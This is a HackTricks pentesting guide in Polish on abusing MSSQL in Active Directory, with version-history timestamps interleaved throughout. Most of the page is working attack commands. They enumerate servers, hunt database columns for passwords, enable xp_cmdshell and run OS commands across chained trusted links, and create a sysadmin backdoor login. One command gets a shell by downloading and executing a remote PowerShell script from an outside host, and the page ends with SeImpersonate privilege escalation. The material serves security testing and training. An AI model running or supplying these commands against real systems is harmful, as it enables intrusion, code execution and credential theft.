2024-05-02 15:11:26 +00:00
# Nadużycie MSSQL AD
2022-04-28 16:01:33 +00:00
< details >
2024-03-26 19:23:44 +00:00
< summary > < strong > Nauka hakowania AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-05-05 22:39:36 +00:00
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem** ? Chcesz zobaczyć swoją **firmę reklamowaną na HackTricks** ? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF** ? Sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-05-02 15:11:26 +00:00
* **Dołącz do** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-04-07 00:09:03 +00:00
* **Podziel się swoimi sztuczkami hakowania, przesyłając PR-y do** [**repozytorium hacktricks** ](https://github.com/carlospolop/hacktricks ) **i** [**repozytorium hacktricks-cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >
2024-05-02 15:11:26 +00:00
< figure > < img src = "https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-07 23:00:14 +00:00
{% embed url="https://websec.nl/" %}
2024-02-11 01:46:25 +00:00
## **Eksploracja / Odkrywanie MSSQL**
2020-07-15 15:43:14 +00:00
2024-04-07 23:00:14 +00:00
Moduł powershell [PowerUpSQL ](https://github.com/NetSPI/PowerUpSQL ) jest bardzo przydatny w tym przypadku.
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
Import-Module .\PowerupSQL.psd1
2022-08-15 13:00:19 +00:00
```
2024-04-07 23:00:14 +00:00
### Wyliczanie z sieci bez sesji domeny
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
2020-07-15 15:43:14 +00:00
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
#If you don't have a AD account, you can try to find MSSQL scanning via UDP
#First, you will need a list of hosts to scan
Get-Content c:\temp\computers.txt | Get-SQLInstanceScanUDP – Verbose – Threads 10
#If you have some valid credentials and you have discovered valid MSSQL hosts you can try to login into them
#The discovered MSSQL servers must be on the file: C:\temp\instances.txt
Get-SQLInstanceFile -FilePath C:\temp\instances.txt | Get-SQLConnectionTest -Verbose -Username test -Password test
2022-08-15 13:00:19 +00:00
```
2024-02-11 01:46:25 +00:00
### Wyliczanie z wnętrza domeny
2022-08-15 13:00:19 +00:00
```powershell
# Get local MSSQL instance (if any)
Get-SQLInstanceLocal
Get-SQLInstanceLocal | Get-SQLServerInfo
2020-07-15 15:43:14 +00:00
#Get info about valid MSQL instances running in domain
#This looks for SPNs that starts with MSSQL (not always is a MSSQL running instance)
2024-02-11 01:46:25 +00:00
Get-SQLInstanceDomain | Get-SQLServerinfo -Verbose
2020-07-15 15:43:14 +00:00
#Test connections with each one
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -verbose
#Try to connect and obtain info from each MSSQL server (also useful to check conectivity)
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
2022-08-15 13:00:19 +00:00
# Get DBs, test connections and get info in oneliner
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo
```
2024-03-26 19:23:44 +00:00
## Podstawowe nadużycie MSSQL
2024-02-11 01:46:25 +00:00
2024-03-26 19:23:44 +00:00
### Dostęp do bazy danych
2022-08-15 13:00:19 +00:00
```powershell
#Perform a SQL query
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select @@servername"
2020-07-15 15:43:14 +00:00
#Dump an instance (a lotof CVSs generated in current dir)
Invoke-SQLDumpInfo -Verbose -Instance "dcorp-mssql"
2022-08-18 23:47:45 +00:00
# Search keywords in columns trying to access the MSSQL DBs
## This won't use trusted SQL links
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "password" -SampleSize 5 | select instance, database, column, sample | ft -autosize
2022-08-15 13:00:19 +00:00
```
### MSSQL RCE
2024-02-11 01:46:25 +00:00
Możliwe jest również **wykonanie poleceń** wewnątrz hosta MSSQL
2022-08-15 13:00:19 +00:00
```powershell
2022-10-08 08:36:40 +00:00
Invoke-SQLOSCmd -Instance "srv.sub.domain.local,1433" -Command "whoami" -RawResults
2022-08-15 13:00:19 +00:00
# Invoke-SQLOSCmd automatically checks if xp_cmdshell is enable and enables it if necessary
```
2024-04-07 00:09:03 +00:00
### Podstawowe sztuczki hakowania MSSQL
2022-08-15 13:00:19 +00:00
2024-05-02 15:11:26 +00:00
{% content-ref url="../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/" %}
[pentesting-mssql-microsoft-sql-server ](../../network-services-pentesting/pentesting-mssql-microsoft-sql-server/ )
{% endcontent-ref %}
## Zaufane łącza MSSQL
2024-04-07 23:00:14 +00:00
Jeśli instancja MSSQL jest zaufana (łącze bazy danych) przez inną instancję MSSQL. Jeśli użytkownik ma uprawnienia do zaufanej bazy danych, będzie mógł **wykorzystać relację zaufania do wykonywania zapytań również w innej instancji** . Te zaufania mogą być łańcuchowane, a w pewnym momencie użytkownik może znaleźć źle skonfigurowaną bazę danych, w której może wykonywać polecenia.
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
**Łącza między bazami danych działają nawet w przypadku zaufania między lasami.**
2024-05-02 15:11:26 +00:00
### Nadużycie Powershell
2022-08-15 13:00:19 +00:00
```powershell
2020-07-15 15:43:14 +00:00
#Look for MSSQL links of an accessible instance
Get-SQLServerLink -Instance dcorp-mssql -Verbose #Check for DatabaseLinkd > 0
2022-12-20 14:18:39 +00:00
#Crawl trusted links, starting from the given one (the user being used by the MSSQL instance is also specified)
2020-07-15 15:43:14 +00:00
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Verbose
2021-01-03 00:43:09 +00:00
#If you are sysadmin in some trusted link you can enable xp_cmdshell with:
Get-SQLServerLinkCrawl -instance "< INSTANCE1 > " -verbose -Query 'EXECUTE(''sp_configure ''''xp_cmdshell'''',1;reconfigure;'') AT "< INSTANCE2 > "'
2020-07-15 15:43:14 +00:00
#Execute a query in all linked instances (try to execute commands), output should be in CustomQuery field
Get-SQLServerLinkCrawl -Instance mssql-srv.domain.local -Query "exec master..xp_cmdshell 'whoami'"
#Obtain a shell
Get-SQLServerLinkCrawl -Instance dcorp-mssql -Query 'exec master..xp_cmdshell "powershell iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1'')"'
#Check for possible vulnerabilities on an instance where you have access
Invoke-SQLAudit -Verbose -Instance "dcorp-mssql.dollarcorp.moneycorp.local"
#Try to escalate privileges on an instance
Invoke-SQLEscalatePriv – Verbose – Instance "SQLServer1\Instance1"
2022-08-18 23:47:45 +00:00
#Manual trusted link queery
Get-SQLQuery -Instance "sql.domain.io,1433" -Query "select * from openquery(""sql2.domain.io"", 'select * from information_schema.tables')"
2022-09-04 09:37:14 +00:00
## Enable xp_cmdshell and check it
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'SELECT * FROM OPENQUERY("sql2.domain.io", ''SELECT * FROM sys.configurations WHERE name = ''''xp_cmdshell'''''');'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''show advanced options'''', 1; reconfigure;'') AT [sql.rto.external]'
Get-SQLQuery -Instance "sql.domain.io,1433" -Query 'EXEC(''sp_configure ''''xp_cmdshell'''', 1; reconfigure;'') AT [sql.rto.external]'
## If you see the results of @@selectname, it worked
Get-SQLQuery -Instance "sql.rto.local,1433" -Query 'SELECT * FROM OPENQUERY("sql.rto.external", ''select @@servername; exec xp_cmdshell ''''powershell whoami'''''');'
2020-07-15 15:43:14 +00:00
```
2022-07-28 09:46:19 +00:00
### Metasploit
2020-07-15 15:43:14 +00:00
2024-02-11 01:46:25 +00:00
Możesz łatwo sprawdzić zaufane linki za pomocą metasploita.
2020-07-15 15:43:14 +00:00
```bash
#Set username, password, windows auth (if using AD), IP...
msf> use exploit/windows/mssql/mssql_linkcrawler
[msf> set DEPLOY true] #Set DEPLOY to true if you want to abuse the privileges to obtain a meterpreter session
```
2024-03-26 19:23:44 +00:00
### Ręcznie - Openquery()
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
Z systemu **Linux** możesz uzyskać konsolę powłoki MSSQL za pomocą **sqsh** i **mssqlclient.py** .
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
Z systemu **Windows** możesz również znaleźć linki i wykonywać polecenia ręcznie za pomocą klienta MSSQL, takiego jak [**HeidiSQL** ](https://www.heidisql.com )
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
_Zaloguj się przy użyciu uwierzytelnienia systemu Windows:_
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
![](< .. / . . / . gitbook / assets / image ( 808 ) . png > )
2020-07-15 15:43:14 +00:00
2024-03-26 19:23:44 +00:00
#### Znajdź godne zaufania linki
2022-08-15 13:00:19 +00:00
```sql
2024-03-26 19:23:44 +00:00
select * from master..sysservers;
EXEC sp_linkedservers;
2022-08-15 13:00:19 +00:00
```
2024-05-05 22:39:36 +00:00
![](< .. / . . / . gitbook / assets / image ( 716 ) . png > )
2020-07-15 15:43:14 +00:00
2024-05-02 15:11:26 +00:00
#### Wykonaj zapytania w zaufanym linku
2022-08-15 13:00:19 +00:00
2024-05-02 15:11:26 +00:00
Wykonaj zapytania poprzez link (przykład: znajdź więcej linków w nowej dostępnej instancji):
2022-08-15 13:00:19 +00:00
```sql
select * from openquery("dcorp-sql1", 'select * from master..sysservers')
```
{% hint style="warning" %}
2024-05-02 15:11:26 +00:00
Sprawdź, gdzie używane są cudzysłowy podwójne i pojedyncze, ważne jest, aby używać ich w ten sposób.
2022-08-15 13:00:19 +00:00
{% endhint %}
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
![](< .. / . . / . gitbook / assets / image ( 643 ) . png > )
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
Możesz kontynuować tę zaufaną łańcuchową listę linków w nieskończoność ręcznie.
2022-08-15 13:00:19 +00:00
```sql
# First level RCE
SELECT * FROM OPENQUERY("< computer > ", 'select @@servername; exec xp_cmdshell ''powershell -w hidden -enc blah''')
# Second level RCE
SELECT * FROM OPENQUERY("<computer1>", 'select * from openquery("< computer2 > ", ''select @@servername; exec xp_cmdshell ''''powershell -enc blah'''''')')
```
2024-02-11 01:46:25 +00:00
### Instrukcja - EXECUTE
2020-07-15 15:43:14 +00:00
2024-05-05 22:39:36 +00:00
Możesz także nadużyć zaufanych łączy za pomocą `EXECUTE` :
2020-07-15 15:43:14 +00:00
```bash
#Create user and give admin privileges
EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
```
2024-03-26 19:23:44 +00:00
## Eskalacja uprawnień lokalnych
2020-07-15 15:43:14 +00:00
2024-05-02 15:11:26 +00:00
Użytkownik lokalny **MSSQL** zazwyczaj ma specjalny rodzaj uprawnienia o nazwie ** `SeImpersonatePrivilege` **. Pozwala to na "podszycie się pod klienta po uwierzytelnieniu".
2022-08-15 13:00:19 +00:00
2024-05-02 15:11:26 +00:00
Strategią, którą wielu autorów wymyśliło, jest zmuszenie usługi SYSTEM do uwierzytelnienia się w fałszywej usłudze lub usłudze typu man-in-the-middle, którą tworzy atakujący. Ta fałszywa usługa jest w stanie podszycić się pod usługę SYSTEM podczas próby uwierzytelnienia.
2022-08-15 13:00:19 +00:00
2024-03-26 19:23:44 +00:00
[SweetPotato ](https://github.com/CCob/SweetPotato ) zawiera zbiór różnych technik, które można wykonać za pomocą polecenia `execute-assembly` w Beacon.
2022-08-15 13:00:19 +00:00
2024-05-02 15:11:26 +00:00
< figure > < img src = "https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt = "" > < figcaption > < / figcaption > < / figure >
2024-04-07 23:00:14 +00:00
{% embed url="https://websec.nl/" %}
2022-04-28 16:01:33 +00:00
< details >
2024-04-07 23:00:14 +00:00
< summary > < strong > Naucz się hakować AWS od zera do bohatera z< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-05-05 22:39:36 +00:00
* Czy pracujesz w **firmie zajmującej się cyberbezpieczeństwem** ? Chcesz zobaczyć swoją **firmę reklamowaną w HackTricks** ? lub chcesz mieć dostęp do **najnowszej wersji PEASS lub pobrać HackTricks w formacie PDF** ? Sprawdź [**PLANY SUBSKRYPCYJNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 01:46:25 +00:00
* Odkryj [**Rodzinę PEASS** ](https://opensea.io/collection/the-peass-family ), naszą kolekcję ekskluzywnych [**NFT** ](https://opensea.io/collection/the-peass-family )
* Zdobądź [**oficjalne gadżety PEASS & HackTricks** ](https://peass.creator-spring.com )
2024-05-05 22:39:36 +00:00
* **Dołącz do** [**💬** ](https://emojipedia.org/speech-balloon/ ) [**grupy Discord** ](https://discord.gg/hRep4RUj7f ) lub [**grupy telegramowej** ](https://t.me/peass ) lub **śledź** mnie na **Twitterze** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
2024-04-07 00:09:03 +00:00
* **Podziel się swoimi sztuczkami hakerskimi, przesyłając PR-y do** [**repozytorium hacktricks** ](https://github.com/carlospolop/hacktricks ) **i** [**repozytorium hacktricks-cloud** ](https://github.com/carlospolop/hacktricks-cloud ).
2022-04-28 16:01:33 +00:00
< / details >